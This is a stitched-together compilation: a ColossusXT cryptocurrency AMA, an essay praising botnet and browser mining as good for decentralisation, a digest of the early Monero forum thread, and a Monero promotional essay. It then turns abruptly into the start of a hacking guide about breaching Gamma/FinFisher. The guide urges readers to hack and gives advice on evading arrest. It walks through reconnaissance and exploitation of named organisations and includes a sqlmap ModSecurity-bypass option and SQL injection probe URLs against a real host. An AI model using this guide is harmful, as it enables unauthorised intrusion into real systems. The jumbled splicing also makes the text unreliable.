always been. Privacy is something each and everyone person owns, until they give it away to someone else. Who is in control of your privacy? You or another person or entity?The future of the ColossusXT user base will comprise of early adopters, enthusiast, computer science professionals, artificial intelligence, and computational linguistics professionals for which these users can utilize the Colossus Grid a wide range of needs. Q: Will ColossusXT join more exchanges soon?? A: Yes. :) Q: So when will Colossus put out lots of advertisement to the various social media sites to get better known? Like Youtube videos etc. A: As we get closer to a product launch of the Colossus Grid, you’ll begin to see more advertisements, YouTubers, and interviews. We’re looking to also provide some presentations at blockchain conferences in 2018, and 2019. Q: In your opinion, what are some of the issues holding COLX back from wider adoption? In that vein, what are some of the steps the team is considering to help address those issues? A: One of the main issues that is holding ColossusXT back from a wider adoption is our endgame is very different from other privacy coins. The Colossus Grid. In order to address this issue, the ColossusXT team intends to have a Colossus Grid Beta out by the end of Q4 and we will move development of the Colossus Grid from Q1 2019 to Q3 2018. Q: Or to see it from another perspective - what are some of the biggest issues with crypto-currency and how does COLX address those issues? A: Biggest issue is that cryptocurrency is seen as a means to make quick money, what project is going to get the biggest “pump” of the week, and there is not enough focus on building blockchain technologies that solve problems or creating legitimate business use cases. For the most part we believe the base of ColossusXT supporters see our end-game, and are willing to provide us with the time and support to complete our vision. The ColossusXT team keeps its head down and keeps pushing forward. Q: I know it's still early in the development phase but can you give a little insight into what to look forward to regarding In-wallet voting and proposals system for the community? How much power will the community have regarding the direction COLX development takes in the future? A: The budget and proposal system is detailed in the whitepaper. Masternode owners vote on and guide the development of ColossusXT by voting on proposals put forth by the community and business partners. Our goal is to make this process as easy and accessible as possible to our community. Q: Will there be an article explaining the significance of each partnership formed thus far? A: Yes, the ColossusXT team will announce partners on social media, and community outlets. A detailed article of what partnerships mean will be available on our Medium page: https://medium.com/@colossusxt Q: What potential output from the Grid is expected and what would it's use be? For example, x teraflops which could process y solutions to protein folding in z time. A: There are many uses for grid computing. A crypto enthusiast mining crypto, a cyber security professional cracking a password using brute force, or a scientist producing climate prediction models. The resources available to put towards grid projects will be determined by the number of nodes sharing resources, and the amount of resources an individual is willing to purchase with COLX. All individuals will not have access to infinite grid resources. Q: Is there a paper wallet available? A: Yes, see https://mycolxwallet.org Q: Is there a possibility of implementing quantum computer measures in the future? A: This is a great idea for potentially another project in the future. Currently this is not possible with the Colossus Grid. Instead of bits, which conventional computers use, a quantum computer uses quantum bits—known as qubits. In classical computing, a bit is a single piece of information that can exist in two states – 1 or 0. Quantum computing uses quantum bits, or 'qubits' instead. These are quantum systems with two states. However, unlike a usual bit, they can store much more information than just 1 or 0, because they can exist in any superposition of these values. Q: Do you plan to do a coin burn? A: No future coin burns are planned. Anything like this would go through a governance proposal and Masternode owners would vote on this. This is not anything we’ve seen within the community being discussed. Q: Can I check the exact number of current COLX master node and COLX staking node? A: Yes. You can view the Masternodes and the amount of ColossusXT (COLX) being staked by viewing the block explorer. Block explorer: https://chainz.cryptoid.info/colx/#!extraction Q: What incentive could we give a youtuber to do the BEST video of ColossusXT (COLX)? A: We've been approached by several YouTubers. The best thing a YouTuber can do is understand what ColossusXT is, join the community, ask questions if there is something they don't understand. The problem with many YouTubers is that some of them are just trying to get paid, they don't really care to provide context or research a project. Disclaimer: This is not all YouTubers, but many. Q: In which ways is the ColossusGrid different from other supercomputer / distributed computing projects out there. Golem comes to mind. Thanks! A: The main difference is that we are focused on the end users privacy, and the types of users that we will be targeting will be those that need more discretion / anonymity in their work. We are building framework that will continue to push the boundaries of user privacy as it relates to grid computing. Q: Can we please complete our roadmap ahead of schedule? I find most other coins that do this actually excell in terms of price and community members. Keep on top of the game :) A: The Colossus XT roadmap is a very fluid document, and it is always evolving. Some items are moved up in priority, and others are moved back. The roadmap should not be thought of something that is set in stone. Q: Does COLX have master nodes? A: Yes. ColossusXT has masternodes. Q: Have thought about providing a method to insert a form of payment in colx in any page that wants to use cryptocurrencies in a fast and simple way in order to masive adoption???? A: There is already this option.https://mycryptocheckout.com/coins/ Q: What do you think your community progress till now? A: The community has grown greatly in the last 3 months. We’re very excited to go from 13 to 100 questions in our quarterly AMA. Discord, Telegram, and Twitter are growing everyday. Q: I noticed on Roadmap: Coinomi and ahapeshift wallet integration. Can you tell me more about this? I am new in crypto and new ColX investor so I don't know much about this. Thanks and keep a good work. A: Coinomi is a universal wallet. ColossusXT will have multiple wallet platforms available to it. Shapeshift allows you to switch one crypto directly for another without the use of a coupler (BTC). Q: Is "A general-purpose decentralized marketplace" written in the whitepaper the same as "E-COMMERCE MARKETPLACE" written on the roadmap? Please tell me about "A general-purpose decentralized marketplace" or "E-COMMERCE MARKETPLACE" in detail. A: Details will be posted as we get closer to the marketplace. It will be similar to other marketplaces within blockchain. Stay tuned for more information by following us on Twitter. Q: History has shown that feature-based technologies always get replaced by technologies with platforms that incorporate those features; what is colossius big picture? A: The Colossus Grid. Which has been explained within this AMA in a few different ways. Q: What are the main objectives for COLX team this year? Provide me 5 reason why COLX will survive in a long term perspective? Do you consider masternodes working in a private easy to setup wallet on a DEX network? Already big fan, have a nice day! A: Getting into Q3 our main object is to get a working product of the Colossus Grid by the end of Q4.
Community - Our community is growing everyday as knowledge about what we’re building grows. When the Colossus Grid is online we expect expansion to grow at a rapid pace as users connect to share resources.
Team - The ColossusXT team will continue to grow. We are stewards of a great community and an amazing project. Providing a level of support currently unseen in many other projects through Discord. The team cohesion and activity within the community is a standard we intend to set within the blockchain communities.
Features - ColossusXT and The Colossus Grid will have user friendly AI. We understand the difficulties when users first enter blockchain products. The confusion between keys, sending/receiving addresses, and understanding available features within. Guides will always be published for Windows/Mac/Linux with updates so that these features can be easily understood.
Colossus Grid - The Colossus Grid answers real world problems, and provides multiple solutions while also reducing energy consumption.
Use Case - Many of the 1000+ other coins on the market don’t have the current use-case that ColossusXT has, let alone the expansion of utility use-cases in multiple sectors.
I think a chaotic and constantly changing mining environment is good for decentralization. There is something called the competitive exclusion principle which states: two species competing for the same limiting resource cannot coexist at constant population values. When one species has even the slightest advantage over another, the one with the advantage will dominate in the long term. This leads either to the extinction of this competitor or to an evolutionary or behavioral shift toward a different ecological niche. https://en.m.wikipedia.org/wiki/Competitive_exclusion_principle Now, all miners are competing for the exact same thing: the block reward. If cost of electricity, cost of hardware, difficulty/difficulty increase, and every other factor were constant, the most savvy miner could continuously reinvest their profits and eventually overtake the entire network. The more constant it is, the more likely you'll see centralization: look at how few and how big the mining pools for Bitcoin are becoming. Imagine if a government were to strategically reduce/remove taxes and subsidize electrical costs for ASIC miners: instantly, miners in that country would be more profitable than anywhere else and soon the majority of miners would be in that country. . That country could easily have 51%+ the mining power, and ultimately could sieze the miners hardware if they don't cooperate with them. Alternatively, imagine a place with cheap electricity, and a use for the heat generated. Imagine a place like Sweden or Canada. Maybe the heat generation could be used for greenhouses or heating Walmarts since it's a cold place, and the electricity is cheap. The fact that we can have smaller GPU/CPU miners, botnet mining, browser mining, and that the GPU/CPU have higher utility for different things: different coins, gaming, artificial intelligence computation, etc, etc ultimately means we have a far higher and more chaotic environment which will ultimately reduce the risk of centralization. If a government were to try the same attack on us, we'd likely be more decentralized: web browser mining and botnets already get electricity for free. People with certain rent/dorm rooms have fixed costs and are getting their electricity for free, which combined with the fact that the barrier to entry for mining is far lower (any computer vs buying an ASIC miner from China), they are more likely to do it. Botnets are not stable. Computers get updated, exploits get fixed etc so botnet mining is a great source of chaos. ASICs, as I think we can observe in the real world is bad for decentralization. The reason they are bad is the same reason why CPU and GPU mining is good for decentralization. Anything that adds chaos and uncertainty to mining makes it more decentralized because the constantly changing environment allows for different strategies to be more profitable for certain periods of times and nothing can become so well established as to take over the network.
The pools are all reporting the wrong network data (I hope its this - but the rate of discovery of blocks by pools would suggest otherwise)”
(https://bitcointalk.org/index.php?topic=583449.msg6782852#msg6782852) -2192: “New source (0.8.8.1) is up with optimizations in the hashing. Hashrate should go up ~4x or so, but may have CPU architecture dependence. Windows binaries are up as well for both 64-bit and 32-bit." (https://bitcointalk.org/index.php?topic=583449.msg6788812#msg6788812) [eizh makes official announce of last miner optimization, it is may 17th] -2219: (https://bitcointalk.org/index.php?topic=583449.msg6792038#msg6792038) [wolf0 is part of the monero community for a while, discussing several topics as botnet mining and miner optimizations. Now spots security flaws in the just launched pools] -2301: "5x optimized miner released, network hashrate decreases by 10% Make your own conclusions. :|" (https://bitcointalk.org/index.php?topic=583449.msg6806946#msg6806946) -2323: "Monero is on Poloniex https://poloniex.com/exchange/btc_mro" (https://bitcointalk.org/index.php?topic=583449.msg6808548#msg6808548) -2747: "Monero is holding a $500 logo contest on 99designs.com now: https://99designs.com/logo-design/contests/monero-mro-cryptocurrency-logo-design-contest-382486" (https://bitcointalk.org/index.php?topic=583449.msg6829109#msg6829109) -2756: “So... ALL Pools have 50KH/s COMBINED. Yet, network hash is 20x more. Am i the only one who thinks that some people are insta mining with prepared faster miners?” (https://bitcointalk.org/index.php?topic=583449.msg6829977#msg6829977) -2757: “Pools aren't stable yet. They are more inefficient than solo mining at the moment. They were just released. 10x optimizations have already been released since launch, I doubt there is much more optimization left.” (https://bitcointalk.org/index.php?topic=583449.msg6830012#msg6830012) -2765: “Penalty for too large block size is disastrous in the long run. Once MRO value increases a lot, block penalties will become more critical of an issue. Pools will fix this issue by placing a limit on number and size of transactions. Transaction fees will go up, because the pools will naturally accept the most profitable transactions. It will become very expensive to send with more than 0 mixin. Anonymity benefits of ring signatures are lost, and the currency becomes unusable for normal transactions.” (https://bitcointalk.org/index.php?topic=583449.msg6830475#msg6830475) -2773: "The CryptoNote developers didn't want blocks getting very large without genuine need for it because it permits a malicious attack. So miners out of self-interest would deliberately restrict the size, forcing the network to operate at the edge of the penalty-free size limit but not exceed it. The maximum block size is a moving average so over time it would grow to accommodate organic volume increase and the issue goes away. This system is most broken when volume suddenly spikes." (https://bitcointalk.org/index.php?topic=583449.msg6830710#msg6830710) -3035: "We've contributed a massive amount to the infrastructure of the coin so far, enough to get recognition from cryptonote, including optimizing their hashing algorithm by an order of magnitude, creating open source pool software, and pushing several commits correcting issues with the coin that eventually were merged into the ByteCoin master. We also assisted some exchange operators in helping to support the coin. To say that has no value is a bit silly... We've been working alongside the ByteCoin devs to improve both coins substantially." (https://bitcointalk.org/index.php?topic=583449.msg6845545#msg6845545) [tacotime defends the Monero team and community of accusations of just “ripping-off” others hard-work and “steal” their project] -3044: "image" (https://bitcointalk.org/index.php?topic=583449.msg6845986#msg6845986) [Monero added to coinmarketcap may 21st 2014] -3059: "You have no idea how influential you have been to the success of this coin. You are a great ambassador for MRO and one of the reasons why I chose to mine MRO during the early days (and I still do, but alas no soup for about 5 days now)." (https://bitcointalk.org/index.php?topic=583449.msg6846509#msg6846509) [random user thanks smooth CONSTANT presence, and collaboration. It is not all FUD ;)] -3068: "You are a little too caught up in the mindset of altcoin marketing wars about "unique features" and "the team" behind the latest pump and dump scam. In fact this coin is really little more than BCN without the premine. "The team" is anyone who contributes code, which includes anyone contributing code to the BCN repository, because that will get merged as well (and vice-versa). Focus on the technology (by all accounts amazing) and the fact that it was launched in a clean way without 80% of the total world supply of the coin getting hidden away "somewhere." That is the unique proposition here. There also happens to be a very good team behind the coin, but anyone trying too hard to market on the basis of some "special" features, team, or developer is selling you something. Hold on to your wallet." (https://bitcointalk.org/index.php?topic=583449.msg6846638#msg6846638) [An answer to those trolls saying Monero has no innovation/unique feature] -3070: "Personally I found it refreshing that Monero took off WITHOUT a logo or a gui wallet, it means the team wasn't hyping a slick marketing package and is concentrating on the coin/note itself." (https://bitcointalk.org/index.php?topic=583449.msg6846676#msg6846676) -3119: “image” [included for the lulz] -3101: "[…]The main developers are tacotime, smooth, NoodleDoodle. Some needs are being contracted out, including zone117x, LucasJones, and archit for the pool, another person for a Qt GUI, and another person independently looking at the code for bugs." (https://bitcointalk.org/index.php?topic=583449.msg6848006#msg6848006) [the initial "core team" so far, eizh post] -3123: (https://bitcointalk.org/index.php?topic=583449.msg6850085#msg6850085) [fluffy steps-in with an interesting dense post. Don’t dare to skip it, worthwhile reading] -3127: (https://bitcointalk.org/index.php?topic=583449.msg6850526#msg6850526) [fluffy again, worth to read it too, so follow link, don’t be lazy] -3194: "Hi guys - thanks to lots of hard work we have added AES-NI support to the slow_hash function. If you're using an AES-NI processor you should see a speed-up of about 30%.” (https://bitcointalk.org/index.php?topic=583449.msg6857197#msg6857197) [flufflypony is now pretty active in the xmr topic and announces a new optimization to the crippled miner] -3202: "Whether using pools or not, this coin has a lot of orphaned blocks. When the original fork was done, several of us advised against 60 second blocks, but the warnings were not heeded. I'm hopeful we can eventually make a change to more sane 2- or 2.5-minute blocks which should drastically reduce orphans, but that will require a hard fork, so not that easy." (https://bitcointalk.org/index.php?topic=583449.msg6857796#msg6857796) [smooth takes the opportunity to remember the need of bigger target block] -3227: “Okay, optimized miner seems to be working: https://bitcointalk.org/index.php?topic=619373” [wolf0 makes public his open source optimized miner] -3235: "Smooth, I agree block time needs to go back to 2 minutes or higher. I think this and other changes discussed (https://bitcointalk.org/index.php?topic=597878.msg6701490#msg6701490) should be rolled into a single hard fork and bundled with a beautiful GUI wallet and mining tools." (https://bitcointalk.org/index.php?topic=583449.msg6861193#msg6861193) [tail emission, block target and block size are discussed in the next few messages among smooth, johnny and others. If you want to know further about their opinions/reasonings go and read it] -3268: (https://bitcointalk.org/index.php?topic=583449.msg6862693#msg6862693) [fluffy dares another user to bet 5 btc that in one year monero will be over dash in market cap. A bet that he would have lost as you can see here https://coinmarketcap.com/historical/20150524/ even excluding the 2M “instamined” coins] -3283: "Most of the previous "CPU only" coins are really scams and the developers already have GPU miner or know how to write one. There are a very few exceptions, almost certainly including this one. I don't expect a really dominant GPU miner any time soon, maybe ever. GPUs are just computers though, so it is certainly possible to mine this on a GPU, and there probably will be a some GPU miner, but won't be so much faster as to put small scale CPU miners out of business (probably -- absent some unknown algorithmic flaw). Everyone focuses on botnets because it has been so long since regular users were able to effectively mine a coin (due to every coin rapidly going high end GPU and ASIC) that the idea that "users" could vastly outnumber "miners" (botnet or otherwise) isn't even on the radar. The vision here is a wallet that asks you when you want to install: "Do you want to devote some of you CPU power to help secure the network. You will be eligible to receive free coins as a reward (recommended) [check box]." Get millions of users doing that and it will drive down the value of mining to where neither botnets nor professional/industrial miners will bother, and Satoshi's original vision of a true p2p currency will be realized. That's what cryptonote wants to accomplish with this whole "egalitarian mining" concept. Whether it succeeds I don't know but we should give it a chance. Those cryptonote guys seem pretty smart. They've probably thought this through better than any of us have." (https://bitcointalk.org/index.php?topic=583449.msg6863720#msg6863720) [smooth vision of a true p2p currency] -3318: "I have a screen shot that was PMed to me by someone who paid a lot of money for a lot of servers to mine this coin. He won't be outed by me ever but he does in fact exist. Truth." (https://bitcointalk.org/index.php?topic=583449.msg6865061#msg6865061) [smooth somehow implies it is not botnets but an individual or a group of them renting huge cloud instances] -3442: "I'm happy to report we've successfully cracked Darkcoin's network with our new quantum computers that just arrived from BFL, a mere two weeks after we ordered them." [fluffy-troll] -3481: “Their slogan is, "Orphaned Blocks, Bloated Blockchain, that's how we do"" (https://bitcointalk.org/index.php?topic=583449.msg6878244#msg6878244) [Major FUD troll in the topic. One of the hardest I’ve ever seen] -3571: "Tacotime wanted the thread name and OP to use the word privacy instead of anonymity, but I made the change for marketing reasons. Other coins do use the word anonymous improperly, so we too have to play the marketing game. Most users will not bother looking at details to see which actually has more privacy; they'll assume anonymity > privacy. In a world with finite population, there's no such thing as anonymity. You're always "1 of N" possible participants. Zero knowledge gives N -> everyone using the currency, ring signatures give N -> your choice, and CoinJoin gives N -> people who happen to be spending around the same amount of money as you at around the same time. This is actually the critical weakness of CoinJoin: the anonymity set is small and it's fairly susceptible to blockchain analysis. Its main advantage is that you can stick to Bitcoin without hard forking. Another calculated marketing decision: I made most of the OP about ring signatures. In reality, stealth addressing (i.e. one-time public keys) already provides you with 90% of the privacy you need. Ring signatures are more of a trump card that cannot be broken. But Bitcoin already has manual stealth addressing so the distinguishing technological factor in CryptoNote is the use of ring signatures. This is why I think having a coin based on CoinJoin is silly: Bitcoin already has some privacy if you care enough. A separate currency needs to go way beyond mediocre privacy improvements and provide true indistinguishably. This is true thanks to ring signatures: you can never break the 1/N probability of guessing correctly. There's no additional circumstantial evidence like with CoinJoin (save for IP addresses, but that's a problem independent of cryptocurrencies)." (https://bitcointalk.org/index.php?topic=583449.msg6883525#msg6883525) [Anonymity discussions, specially comparing Monero with Darkcoin and its coinjoin-based solution, keep going on] -3593: "Transaction fees should be a fixed percentage of the block reward, or at the very least not be controllable by the payer. If payers can optionally pay more then it opens the door for miner discrimination and tx fee bidding wars." (https://bitcointalk.org/index.php?topic=583449.msg6886770#msg6886770) [Johnny Mnemonic is a firm defender of fixed fees and tail emission: he see the “fee market” as big danger to the usability of cryptocurrencies] -3986: (https://bitcointalk.org/index.php?topic=583449.msg6930412#msg6930412) [partnership with i2p] -4373: “Way, way faster version of cpuminer: https://bitcointalk.org/index.php?topic=619373” (https://bitcointalk.org/index.php?topic=583449.msg6993812#msg6993812) [super-optimized miner is finally leaked to the public. Now the hashrate is 100 times bigger than originally with crippled miner. The next hedge for "cloud farmers" is GPU mining] -4877: “1. We have a logo! If you use Monero in any of your projects, you can grab a branding pack here. You can also see it in all its glory right here: logo […] 4. In order to maintain ISO 4217 compliance, we are changing our ticker symbol from MRO to XMR effective immediately." (https://bitcointalk.org/index.php?topic=583449.msg7098497#msg7098497) [Jun 2nd 2014] -5079: “First GPU miner: https://bitcointalk.org/index.php?topic=638915.0” (https://bitcointalk.org/index.php?topic=583449.msg7130160#msg7130160) [4th June: Claymore has developed the first CryptoNight open source and publicly available GPU miner] -5454: "New update to my miner - up to 25% hash increase. Comment and tell me how much of an increase you got from it: https://bitcointalk.org/index.php?topic=632724" (https://bitcointalk.org/index.php?topic=583449.msg7198061#msg7198061) [miner optimization is an endless task] -5464: "I have posted a proposal for fixed subsidy: https://bitcointalk.org/index.php?topic=597878.msg7202538#msg7202538" (https://bitcointalk.org/index.php?topic=583449.msg7202776#msg7202776) [Nice charts and discussion proposed by tacotime, worth reading it] -5658: "- New seed nodes added. - Electrum-style deterministic wallets have been added to help in the recovery of your wallet should you ever need to. It is enabled by default." (https://bitcointalk.org/index.php?topic=583449.msg7234475#msg7234475) [Now you can recover your wallet with a 24 word seed] -5726: (https://bitcointalk.org/index.php?topic=583449.msg7240623#msg7240623) [Bitcoin Pizza in monero version: a 2500 XMR picture sale (today worth ~$20k)] -6905: (https://bitcointalk.org/index.php?topic=583449.msg7386715#msg7386715) [Monero missives: CryptoNote peer review starts whitepaper reviewed)] -7328: (https://bitcointalk.org/index.php?topic=583449.msg7438333#msg7438333) [android monero widget built] This is a dense digest of the first several thousand messages on the definitive Monero thread. A lot of things happened in this stressful days and most are recorded here. It can be summarized in this:
28th April: Othe and zone117x assume the GUI wallet and CN pools tasks.
30th April: First NoodleDoodle's miner optimization.
11th May: First Monero exchanger
13th May: Open source pool code is ready.
16th May: First pool mined block.
19th May: Monero in poloniex
20th May: Monero +1100 bitcoin 24h trading volume in Poloniex.
21st May: New official miner optimization x4 speed (accumulated optimization x12-x16). Open source wolf0's CPU miner released.
25th May: partnership with i2p
28th May: The legendary super-optimized miner is leaked. Currently running x90 original speed. Hedge of the "cloud farmers" is over in the cpu mining.
2nd June: Monero at last has a logo. Ticker symbol changes to the definitive XMR (former MRO)
4th June: Claymore's open source GPU miner.
10th June: Monero's "10,000 bitcoin pizza" (2500 XMR paintig). Deterministic seed-based wallets (recover wallet with a 24 word seed)
March 2015 – tail emission added to code
March 2016 – monero hard forks to 2 min block and doubles block reward
There basically two things in here that can be used to attack Monero:
Crippled miner Gave unfair advantage to those brave enough to risk money and time to optimize and mine Monero.
Fast curve emission non-bitcoin-like curve as initially advertised and as it was widely accepted as suitable
Though we have to say two things to support current Monero community and devs:
The crippled miner was coded either by Bytecoin or CryptoNote, and 100% solved within a month by Monero community
The fast curve emission was a TFT miscalculation. He forgot to consider that as he was halving the block target he was unintentionally doubling the emission rate.
Wikipedia has "pillars", foundational commitments which guide its develoments. Similarly, Monero has three pillars. The three pillars of Monero are privacy, decentralization and scalability. Now what does it means?
Monero is true electronic cash. With Monero, you can know that a transaction occured, but not whence, how much and whither, whilst it is getting increasingly easy to trace Bitcoin (mixers, tumblers… do not work). See this illustration on how it positions compared to Bitcoin and this animation on how it works. Monero is a cryptocurrency that is based on the CryptoNote protocol and reference code, and that seeks to provide absolute transactional privacy (fluffypony). But Monero is more than a currency. Its official slogan is "secure, private, untraceable" for a reason. Other transactions than the monetary ones benefit from it. You may not want anyone to know you signed this contract. You may not want the forthcoming blockchain-powered internet of things cloud around you to be accessible by anyone, and this requires an opaque blockchain, that Monero provides. We hired academic cryptographers to review and improve the security of Monero and started an external audit as well. Even Bitcoin developers and independent cryptographers (Andrew Poelstra/andytoshi, Gregory Maxwell, Nicolas Courtois) speak high of Monero and Cryptonote. Finally, security is a chain as strong as its weakest link. What is privacy of the transaction worth if your IP is revealed? This is why we are teaming up with Privacy Solutions to have an i2p router implemented in Monero. IP obfuscation, amount obfuscation, recipient obfuscation, sender obfuscation. May I remind everyone that privacy is more than drugs and illegality? Are you ready to give everyone (EVERYONE) read access to your bank account? Would your like your ex-wife, your son, your boss, your neigbour or (particularly if you are a company) your competitor to know how much money you have, where it comes from and what you doing with it, forever (and no, multiples addresses or mixers or tumblers just don't work)? Would you like your landlord to know that you just got some money, so s/he can raise the rent? Privacy is also making it possible for journalists fighting for the freedom of press to do their jobs when there are in a dictatorial (or not-so-dictatorial) country. This is also about not being incriminated because your money was tainted (two transactions before, it went from drug dealing, for instance).Countless studies showed that people behave differently when they know they might be watched. As tacotime (a core team member) said back in April, when Monero was only one week old, Fuck the pump and dumps, we're here to create something with value that people can use.
Despite being decentralised at heart, cryptocurrencies are increasingly centralised. Webwallets, exchanges, pool mining and cloud mining, centralised seedings or masternodes… All of this is susceptible to attacks (both technical or legal - remember that "legal" doesn't necessarily means "legitimate"). Whilst Monero is decentralised mixing. By contrast, we are trying hard to keep Monero decentralised. Our domain names for the most parts are meant to be resistant to such attacks (gun.io on choosing domain names and registrars). The core team is composed of both public faces (myself and Riccardo Spagni/fluffypony) and private faces (the other core team members) located on various continents with widely different timezones, making sure that core devs are avaialble 24/7. This extends to technology too. When implementing something, we keep in mind how it will affect decentralisation. We recently released the first Monero torrent and we also created an open standard for simpler sending of cryptocurrencies, OpenAlias. The smart mining forthcoming feature will allow transparent CPU mining on your own computer, far from the de facto centralisation of mining farms and pool mining. We intend to pursue Satoshi's original vision of a true p2p currency. "Get millions of users doing that and it will drive down the value of mining to where neither botnets nor professional/industrial miners will bother, and Satoshi's original vision of a true p2p currency will be realized." (smooth).
Monero is meant to stay. Long. This means it must be able to be adopted by anyone, that anyone can use it. Open-source is a given and smart mining participates of it too. But beyond this, we chose a currency code a.ka. ticker symbol (XMR) that adheres to the international monetary standard ISO 4217. We are doing our best to follow technological best practices. Recently, we worked with Kitware to have our Cmake tool adhere to the best practices and we will soon transition to semantic versioning (semver.org). Similarly, the block time, mixin count… are designed (and sometimes redesigned) with long-term scalability in mind. More importantly maybe, Monero doesn't suffer from some of the inherent flaws of many orther cryptocurrencies. Monero is fair-launched and doesn't have a 1 MB blocksize which limits the ultimate amount of transaction per day. Today, it doesn't matter much, but tomorrow when Monero will be much more popular, this will be instrumental in ensuring that Monero can continue to grow - this is the whole point of scalability: it may not matter today, but it does for tomorrow when it will be so hard to change it. The same consideration are given to the emission curve. We believe (and we are not the only ones), that relying only on transaction fees won't be enough of an incentive for miners (remember: the core of the blockchain is to rely on an economic incentive, because it is not possible to solve the Byzantine Generals' problem with math alone). This is why Monero implements a "tail emission" that will kick off once the main emission is over, in less than eight years. Scalability is not only about technology. It also about making sure that everyone gets their side of the bargain or else it will be rejected. That's why Monero is also optionally transparent. This means that, on a completely voluntary basis, one can give read access to someone else. Quoting fluffypony on reddit: "A view key can be used to reveal all transactions for an account. This means that companies could still be audited, charities could make their accounts publicly visible, and parents could see what their kids are spending the money on. Additionally, details of a transaction can be revealed via a similar mechanism on a per-transaction basis." This is also to increase legitimacy that the Monero Economy Workgroup (disclaimer: I am an executive of the MEW) was created (what is MEW? - join MEW). The MEW takes decision (that, granted, the core team is not bound to accept, but refusing a widely adopted decision would cause turmoil) and since the MEW is meant to represent the will of most holders, it will increase legitimacy: something decided by the MEW is something most holders are willing to do. The debate on the emission curve is a perfect example: the MEW unanimously decided to not change the emission curve, and confidence went back immediately. Consistent confidence is part of scalability. Security, decentralization, scalability. These are the three pillars of Monero. The vision of Monero is to be as future-proof as possible.
--1-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. -- 2 -- Staying Safe This is illegal, so you'll need to take same basic precautions:
(Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. -- 3 -- Mapping out the target Basically I just repeatedly use fierce.pl, whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. -- 4 -- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running:
Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code.
Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.
Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.
Run nikto. This will check for things like webserve.svn/, webservebackup/, webservephpinfo.php, and a few thousand other common mistakes and misconfigurations.
Identify what software is being used on the website. WhatWeb is useful
First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP, and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. For finsupport.finfisher.com the process was:
Start nikto running in the background.
Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
See if WhatWeb knows anything about what software the site is running.
WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php"
I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
google allinurl:"Scripts/scripts.js.php" and find the other sites
Notice they're all sql injectable in the first url parameter I try.
Realize they're running Apache ModSecurity so I need to use sqlmap with the option --tamper='tampemodsecurityversioned.py'
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
